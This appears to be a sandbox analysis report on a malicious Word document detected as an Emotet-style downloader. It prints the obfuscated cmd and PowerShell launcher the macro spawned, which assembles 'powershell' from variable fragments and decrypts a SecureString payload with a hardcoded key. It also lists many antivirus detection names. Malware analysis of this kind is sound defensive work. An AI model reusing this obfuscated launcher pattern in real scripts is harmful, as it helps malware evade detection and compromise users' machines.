parent_process winword.exe martian_process cmd apRbHrO EDHKZhizWwzfbiXhDYoTSzLT IIqwNqsjaWqf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %qSKqZwGasVPLAjE%=mYSBOWwfLFAOv&&set %ZFJjsqCNFzjUTZ%=p&&set %CQFswJPFuKz%=ow&&set %mNsVdcoFqUDskdE%=VSvEcjcq&&set %iZIRGWMKmMNiTh%=!%ZFJjsqCNFzjUTZ%!&&set %vETUfiTwsfFHWqW%=PmvDOId&&set %wUuTGGAzLdENi%=er&&set %IMHbLklGnQWW%=!%CQFswJPFuKz%!&&set %BYmEZDNYMcNku%=s&&set %stXpmEJSClCZYIU%=LAFAFYwkfwr&&set %KzPWuzEtLfcOS%=he&&set %RYMrNHHqSqk%=ll&&!%iZIRGWMKmMNiTh%!!%IMHbLklGnQWW%!!%wUuTGGAzLdENi%!!%BYmEZDNYMcNku%!!%KzPWuzEtLfcOS%!!%RYMrNHHqSqk%! "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('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' | ConvERtTO-seCUresTRInG -kEy 235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
parent_process winword.exe martian_process "C:\Windows\System32\cmd.exe" apRbHrO EDHKZhizWwzfbiXhDYoTSzLT IIqwNqsjaWqf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %qSKqZwGasVPLAjE%=mYSBOWwfLFAOv&&set %ZFJjsqCNFzjUTZ%=p&&set %CQFswJPFuKz%=ow&&set %mNsVdcoFqUDskdE%=VSvEcjcq&&set %iZIRGWMKmMNiTh%=!%ZFJjsqCNFzjUTZ%!&&set %vETUfiTwsfFHWqW%=PmvDOId&&set %wUuTGGAzLdENi%=er&&set %IMHbLklGnQWW%=!%CQFswJPFuKz%!&&set %BYmEZDNYMcNku%=s&&set %stXpmEJSClCZYIU%=LAFAFYwkfwr&&set %KzPWuzEtLfcOS%=he&&set %RYMrNHHqSqk%=ll&&!%iZIRGWMKmMNiTh%!!%IMHbLklGnQWW%!!%wUuTGGAzLdENi%!!%BYmEZDNYMcNku%!!%KzPWuzEtLfcOS%!!%RYMrNHHqSqk%! "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('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' | ConvERtTO-seCUresTRInG -kEy 235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
The process winword.exe wrote an executable file to disk which it then attempted to execute (1 event)
file: C:\Windows\System32\cmd.exe
File has been identified by 15 AntiVirus engines on IRMA as malicious (15 events)
G Data Antivirus (Windows) Virus: VB.Heur.EmoDldr.4.F649EAB6.Gen (Engine A)
Avast Core Security (Linux) Script:SNH-gen [Drp]
C4S ClamAV (Linux) Doc.Dropper.Agent-6474259-0
F-Secure Antivirus (Linux) Trojan:W97M/AutorunMacro.D [FSE]
Sophos Anti-Virus (Linux) Troj/DocDl-NAR
eScan Antivirus (Linux) VB.Heur.EmoDldr.4.F649EAB6.Gen(DB)
ESET Security (Windows) VBA/TrojanDownloader.Agent.HGD trojan
McAfee CLI scanner (Linux) Downloader-FBOU
DrWeb Antivirus (Linux) Exploit.Siggen3.19591
Trend Micro SProtect (Linux) W2KM_POWLOAD.AOECV
WithSecure (Linux) Trojan:W97M/AutorunMacro.D
ClamAV (Linux) Doc.Dropper.Agent-6474259-0
Bitdefender Antivirus (Linux) VB.Heur.EmoDldr.4.F649EAB6.Gen
Kaspersky Standard (Windows) Trojan-Downloader.MSWord.Agent.bxu
Emsisoft Commandline Scanner (Windows) VB.Heur.EmoDldr.4.F649EAB6.Gen (B)
File has been identified by 44 AntiVirus engines on VirusTotal as malicious (44 events)
Lionic Trojan.MSWord.Agent.a!c
MicroWorld-eScan VB:Trojan.Valyria.1391
CAT-QuickHeal W97M.Emotet.Heur
McAfee RDN/GenDownloader.avo
ALYac Trojan.Downloader.VBA.gen
Sangfor Malware
K7AntiVirus Trojan ( 00536d111 )
K7GW Trojan ( 00536d111 )
Baidu VBA.Trojan-Downloader.Agent.cpf
Cyren W97M/Agent
TrendMicro-HouseCall W2KM_POWLOAD.AOECV
Avast Other:Malware-gen [Trj]
ClamAV Doc.Dropper.Agent-6474259-0
Kaspersky Trojan-Downloader.MSWord.Agent.bxu
BitDefender VB:Trojan.Valyria.1391
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
Rising Downloader.Donoff!8.36C (TOPIS:E0:ktvwH8uWY3)
Endgame malicious (high confidence)
Emsisoft VB:Trojan.Valyria.1391 (B)
Comodo Malware@#1fyiqszs4pd25
F-Secure Trojan:W97M/AutorunMacro.D
TrendMicro W2KM_POWLOAD.AOECV
McAfee-GW-Edition BehavesLike.Dropper.cg
FireEye VB:Trojan.Valyria.1391
Sophos Troj/DocDl-NAR
Ikarus Trojan-Downloader.VBA.Agent
F-Prot New or modified W97M/Agent
Avira W97M/Agent.05668317
MAX malware (ai score=97)
Antiy-AVL Trojan[Downloader]/MSOffice.Agent.hgd
Microsoft TrojanDownloader:O97M/Donoff.RB
Arcabit HEUR.VBA.Trojan.e
AhnLab-V3 VBA/Downloader
ZoneAlarm Trojan-Downloader.MSWord.Agent.bxu
GData VB:Trojan.Valyria.1391
AVG Other:Malware-gen [Trj]
ESET-NOD32 VBA/TrojanDownloader.Agent.HGD
TACHYON Suspicious/W97M.Obfus.Gen.3
Ad-Aware VB:Trojan.Valyria.1391
Zoner Probably W97Obfuscated
Tencent OLE.Win32.Macro.703912
SentinelOne DFI - Malicious OLE
Fortinet VBA/Agent.HHV!tr
Qihoo-360 virus.office.qexvmc.1065
Domains (Name / Response / Post-Analysis Lookup): No hosts contacted.
IP addresses (Address / Status / Action / VT / Location): No hosts contacted.